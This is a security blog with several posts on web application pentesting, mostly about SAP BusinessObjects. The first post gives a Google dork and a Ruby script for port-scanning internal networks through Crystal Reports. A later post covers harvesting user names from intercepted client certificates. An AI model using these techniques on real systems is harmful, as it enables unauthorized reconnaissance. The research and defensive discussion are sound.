Internal Port Scanning via Crystal Reports

December 2, 2010

Another fun attack that willis and I found during our SAP BusinessObjects research is that we could do internal port scanning by using Crystal Reports.

The way this works is that when you browse to a Crystal Reports web application (http://hostname/CrystalReports/viewrpt.cwr) there are a few parameters which are used to communicate with the SAP services on the backend. The problem is that these parameters are controlled by the user. A better design would provide a drop-down list or handle all of this configuration on the server side.

Since the user can modify the IP and port which the web application communicates with on the backend (port 6400 by default), the next step is to map the responses to open and closed states so that we can programmatically map out the internal network.

Here are a few nice Google Dorks:
filetype:cwr inurl:apstoken

Here is the resulting mapping:

Port Open Response:
# Unable to open a socket to talk to CMS $HOSTNAME:445 (FWM 01005)

Port Closed Response:
# Server $HOSTNAME:80 not found or server may be down (FWM 01003)

Lastly, all we need to do is modify the IP and port to whatever we are trying to scan. This is faster than using BeEF’s JavaScript internal port-scanning functionality and it doesn’t require client interaction. Pwn dem v0hns!
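Putting the pieces together, a scanner only needs to vary the target host/port and bucket responses by those FWM codes. Here is a minimal Ruby sketch; the `aps` query parameter name is an assumption for illustration, since the real parameter depends on the BusinessObjects deployment:

```ruby
require 'net/http'
require 'uri'

# Classify a viewrpt.cwr response body using the FWM error codes above.
def classify(body)
  return :open   if body.include?('FWM 01005') # socket opened, CMS handshake failed
  return :closed if body.include?('FWM 01003') # server not found / port closed
  :unknown
end

# Probe one internal host:port through the Crystal Reports viewer.
# 'aps' is a hypothetical parameter name; adjust for the target deployment.
def probe(viewer_host, target, port)
  uri = URI("http://#{viewer_host}/CrystalReports/viewrpt.cwr?aps=#{target}:#{port}")
  classify(Net::HTTP.get(uri))
end

# Example sweep of a few common ports on an internal host:
# [21, 80, 139, 445, 6400].each do |p|
#   puts "#{p}: #{probe('victim.example.com', '10.0.0.5', p)}"
# end
```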



Security-patching Common Web Development Frameworks

November 22, 2010

A few weeks ago at OWASP AppSec DC we made progress on an idea that several of us (@RafalLos, @secureideas, @securityninja, @TheCustOS) have been talking about on Twitter for a while. The idea is based on trying to determine a good solution to what we see as the general brokenness of the Internet’s web applications. Not only do we see current applications as badly broken, but the velocity at which developers are building new insecure web applications is increasing. The panel that we hosted at OWASP AppSec DC discussed one method by which we can contribute to reducing the rate at which new, insecure web applications are being developed.

Our idea is based on improving the security of existing web application development frameworks; adding security components into their core, thus making security more transparent to the developer and potentially having the effect of producing more secure web applications.

While certain elements of WebAppSec, such as training, will help to reduce the volume and impact of vulnerabilities, training simply hasn’t proven to be a solution that scales well. The root of the problem is that the number of developers in the world is many orders of magnitude larger than the number of WebAppSec trainers. Trainers are also limited by several factors, such as the need to understand language-specific constructs and limitations and the need to constantly keep up with changing development methodologies. This drastically shrinks the pool of qualified, available trainers.

There are two points we need to address so that everyone is clear on the types of vulnerabilities we want to cover and how we will improve existing frameworks. Trying to fix all WebAppSec vulnerabilities programmatically is an arduous and complex task, so we have decided to focus on form-based attacks (SQLi, XSS, etc.). Our approach will focus strictly on the types of flaws which can be readily addressed with minimal impact on the framework’s structure and coding principles.
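As a rough illustration of what baking these protections into a framework core could look like, here is a minimal Ruby sketch. Both helper names are hypothetical, not from any real framework: output is HTML-encoded unless the developer explicitly opts out, and queries only go through a parameterized interface.

```ruby
require 'cgi'

# Hypothetical framework helper: HTML-encode everything rendered into a
# template unless the developer explicitly opts out, blunting reflected XSS.
def render_value(value, raw: false)
  raw ? value.to_s : CGI.escapeHTML(value.to_s)
end

# Hypothetical framework query interface: the driver binds the placeholder,
# so string-concatenated SQL never reaches the database, blocking SQLi.
# 'db' is any handle exposing a parameterized execute (e.g. sqlite3).
def find_user(db, username)
  db.execute('SELECT * FROM users WHERE name = ?', [username])
end
```

The point is not these particular helpers, but that the secure behavior is the default path; the developer has to do extra work to be insecure.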

Next, we have to cover which frameworks and versions we will try to improve. The consensus from the panel discussion is that we should not focus on adding security to legacy versions of the frameworks; that would be a losing battle, since over time developers will likely move to newer versions that contain the applied fixes.

The core idea is to improve existing development frameworks by adding security controls into the upstream version of the framework. This means that as the framework gains additional features which developers will want, they will have the added benefit of getting a more secure framework “right out of the box”. We understand that developers have little incentive to produce more secure code when it competes with their often aggressive release deadlines.

Making the frameworks incorporate security is very important, and I think the ideal way to reduce the rate at which vulnerable web applications are being developed is to make it more difficult for developers to write insecure code. From a business perspective, this reduces the time and productivity cost of writing “more secure code”. Our goal is to make the applications being developed more secure by making security less visible and requiring less effort. We feel this will be the most effective and impactful method of raising overall web application security – by making it simple and (nearly) transparent for developers. We know developers don’t write poorly secured code on purpose, so by making security easier on them, there is a greater chance of the final product having a higher level of software security. It may not be possible to make the entire Internet secure, but if we can change the velocity at which new, vulnerable web applications are being developed then we are making huge strides toward a more secure Internet.

Perhaps the most important question, now that we have acceptance of our idea, is: what do we do first? Clearly, step one is gaining community support. I’m not 100% sure that creating a new OWASP project is the best method… The alternative is to use another site like Google Groups or something similar for managing our efforts.

We welcome community input! Please feel free to leave comments. We look forward to seeing what other people in the community have to say about these ideas.

Pentesting Web Services

November 21, 2010

Recently, I have been doing a few presentations with Will Vandevanter (@willis__) talking about Hacking SAP BusinessObjects. As a reference to anyone who hasn’t seen the presentation I thought it would be useful to do a few follow-up blog posts to clarify a few topics in greater detail.

The essence of the presentation was focused on pentesting SAP’s Service Oriented Architecture (SOA). There are two common ways to do SOA (SOAP and REST); the method used by SAP BusinessObjects is SOAP. For anyone that isn’t familiar with SOAP, just think of XML messages on top of HTTP. Below is a simple Ruby client that makes a SOAP request to the web service. There are a few things which make this sample very useful to anyone performing a penetration test. First, the request and response are stored in txt files, which is useful for logging and manual review of details. Second, the request is made using a local proxy on 8080/tcp (BurpSuite, WebScarab, etc.).

By using a proxy, the pentester has fine-grained control of the request. Even though BurpSuite doesn’t have built-in web services support, pentesters can still use the proxy to intercept requests since it’s just HTTP. The workflow is to intercept a SOAP request and then use the intruder to fuzz any parameters in the web service. Pentesters also use BurpSuite (or whatever proxy they prefer) to replay requests and perform PRNG testing (similar to session id testing).

Sample Ruby SOAP client
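A minimal sketch of such a client using only Ruby’s standard library. The endpoint path, SOAP operation, and field names below are placeholders for illustration, not the actual BusinessObjects service definitions; the request and response are written to txt files, and traffic is routed through a local proxy on 8080/tcp:

```ruby
require 'net/http'
require 'uri'

# Hypothetical endpoint and operation; substitute values from the target's WSDL.
ENDPOINT = URI('http://target.example.com/dswsbobje/services/Session')

def build_envelope(username, password)
  <<~XML
    <?xml version="1.0" encoding="UTF-8"?>
    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
      <soapenv:Body>
        <login>
          <userName>#{username}</userName>
          <password>#{password}</password>
        </login>
      </soapenv:Body>
    </soapenv:Envelope>
  XML
end

def soap_request(envelope)
  # Route through a local intercepting proxy (BurpSuite, WebScarab, ...).
  http = Net::HTTP.new(ENDPOINT.host, ENDPOINT.port, '127.0.0.1', 8080)
  req  = Net::HTTP::Post.new(ENDPOINT.path,
                             'Content-Type' => 'text/xml; charset=UTF-8',
                             'SOAPAction'   => '""')
  req.body = envelope

  # Store the raw request/response in txt files for logging and manual review.
  File.write('request.txt', envelope)
  resp = http.request(req)
  File.write('response.txt', resp.body.to_s)
  resp
end

# soap_request(build_envelope('Administrator', ''))
```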

Let me know what you think. What methods are you using to pentest web services? What tools do you use? Comments welcome!

Hack the Planet!


Sans Pentest Summit 2010 – Goal Oriented Pentesting

August 4, 2010

Back in June, I was in Baltimore for the SANS Pentest Summit 2010. I really enjoyed this conference, since it provided the opportunity to chat with many people that are working on ways to improve the penetration testing process. At the conference, I presented the Goal Oriented Pentesting theory that I have been talking about for a while (first post, second post). The talk expanded upon the original theories by incorporating specific methods which provide criteria for anyone looking to implement Goal Oriented Pentesting in their security assessments. I also included examples from several security assessments that I have performed (external pentest, internal pentest and web app audit) so that attendees would be able to use these goals as a guide in the future.

The slides from the talk can be found here.

What else should be done to improve upon this? Let me know what you think!

OWASP AppSec 09 – Synergy! A world where the tools communicate

November 3, 2009

On November 12th, I will be giving a talk at the annual OWASP AppSec conference titled “Synergy! A world where the tools communicate”. I am really excited to give this talk, since I have been working on the content for almost 2 years. If you have attended any of my talks in the past, like BlackHat/DefCon, ShmooCon and/or InfoSec World, you already know that I will bring tons of fresh code! I can’t wait for OWASP AppSec 09.

Brace yourself. We are gonna raise the bar on the industry.


Burpsuite::Parser 0.01

October 15, 2009

Just to get everyone excited for my talk, “Synergy! A world where the tools communicate” at OWASP NYC today, I decided to release Burpsuite::Parser 0.01 a little early.

Here is an example of using the module:

use Burpsuite::Parser;

my $bpx = new Burpsuite::Parser;
my $parser = $bpx->parse_file('burpsuite.xml');
#a Burpsuite::Parser Object
my @results = $parser->get_all_issues();
#an Array of Burpsuite::Parser::Issue Objects
foreach my $h ( @results ) {
     print "Severity: " . $h->severity . "\n";
     print "Host: " . $h->host . "\n";
     print "Name: " . $h->name . "\n";
     print "Path: " . $h->path . "\n";
     print "Proof of Concept:\n " . $h->issue_detail . "\n";
}

Version 0.01 of the module can be found at

One good thing to note: all of the requests/responses are automatically included in the XML. To reduce the size of the XML, it may be helpful to generate the file without them, which will make parsing faster.


Client-Side Certs – Oh my!

October 12, 2009

One of the techniques demonstrated during the BlackHat/DefCon talk I gave with RSnake was abusing client-side certificates. Client-side certificates allow a server to establish a degree of trust in the client that is connecting to it. They are used by companies that don’t want to deal with deploying tokens, and they are also used by several SSL VPN devices.

To demonstrate client-side certificates, I first needed to create a few certificates so the client could connect to the server.

Using openssl, I created the certificate:
openssl req \
-x509 -nodes -days 365 \
-newkey rsa:1024 -keyout mycert.pem -out mycert.pem

Next, I needed to set up the server to use the certificate. I started thinking about the easiest way to accomplish this goal. It occurred to me that instead of using Apache, I could use the built-in web server in openssl. This made setup easier, since it replaced Apache with a single command.

Here is an example:
openssl s_server -accept 443 -cert mycert.pem -www -verify 10

Finally, I set up a client and verified that the browser contained a client-side certificate for ANOTHER server, so there is no trust relationship between the public key within the client’s browser and the openssl server. The key point is that the browser will ask to send the public key every time! The only thing an attacker needs to do is listen on the wire and intercept the public key.

Now you may ask, “who cares about the information in a public key?” Well, client-side certificates can contain the following information:

  • Email Address (perhaps a valid username)
  • Hostname and maybe OS of the server
  • Date the Certificate was Issued
  • Date the Certificate Expires
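Extracting those fields is straightforward with Ruby’s openssl standard library. The sketch below generates a throwaway self-signed certificate (with a made-up subject and email) just so it is self-contained; in practice you would load the certificate captured off the wire:

```ruby
require 'openssl'

# Pull the fields of interest out of an X.509 client certificate.
def cert_intel(cert)
  email = cert.subject.to_a.find { |name, _, _| name == 'emailAddress' }&.at(1)
  { email: email, issued: cert.not_before, expires: cert.not_after }
end

# Build a throwaway self-signed cert so this sketch is self-contained.
key  = OpenSSL::PKey::RSA.new(2048)
cert = OpenSSL::X509::Certificate.new
cert.version    = 2
cert.serial     = 1
cert.subject    = OpenSSL::X509::Name.parse(
  '/CN=host01.corp.example/emailAddress=jane.doe@example.com')
cert.issuer     = cert.subject
cert.public_key = key.public_key
cert.not_before = Time.now
cert.not_after  = Time.now + 365 * 24 * 3600
cert.sign(key, OpenSSL::Digest.new('SHA256'))

p cert_intel(cert)  # => {:email=>"jane.doe@example.com", :issued=>..., :expires=>...}
```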

Sometimes, the email address being used contains the user’s name. Many organizations standardize on a common email schema, often some variation of the employee’s first and last name:


  • [firstname].[lastname]
  • [firstname]-[lastname]
  • [firstname]_[lastname]

If this is the case, an attacker can extract this information and learn the user’s full name. For the purposes of achieving remote access, this is only one piece of the puzzle.

The next piece of information is the date the certificate expires. Since we know a valid email address, it is possible this is also a valid username for network-based attacks. Putting the username and dates together gives the attacker a greater likelihood of performing a successful attack.
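Turning a harvested email address into candidate names and usernames is easy to script. A small sketch, assuming the schemas above; the username patterns are guesses for illustration, not from any particular environment:

```ruby
# Split the local part of an email on common separators to guess
# the employee's first and last name.
def guess_name(email)
  local = email.split('@').first
  parts = local.split(/[._-]/)
  return nil unless parts.length == 2
  { first: parts[0].capitalize, last: parts[1].capitalize }
end

# Candidate usernames for network-based attacks (hypothetical schemas).
def candidate_usernames(first, last)
  f, l = first.downcase, last.downcase
  ["#{f}.#{l}", "#{f}-#{l}", "#{f}_#{l}", "#{f[0]}#{l}", "#{l}#{f[0]}"]
end
```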